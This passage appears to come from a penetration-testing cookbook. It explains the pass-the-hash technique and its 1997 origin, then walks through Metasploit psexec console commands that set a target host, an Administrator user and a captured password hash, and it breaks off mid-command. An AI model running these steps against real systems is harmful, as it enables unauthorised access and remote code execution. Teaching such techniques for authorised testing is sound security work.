The pass the hash technique allows us to authenticate to a remote server or service by passing the hashed credentials directly without cracking them. This technique was first published on Bugtraq back in 1997 by Paul Ashton in an exploit called NT Pass the Hash.
Passing the hash
How to do it...
To perform a pass the hash attack, we can use the Microsoft Windows Authenticated User Code Execution exploit module and use the previous capture hash instead of the plaintext password:
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.216.10
RHOST => 192.168.216.10
msf exploit(psexec) > set SMBUser Administrator
SMBUser => Administrator
msf exploit(psexec) > set SMBPASS
aad3b435b51404eeaad3b435b51404ee...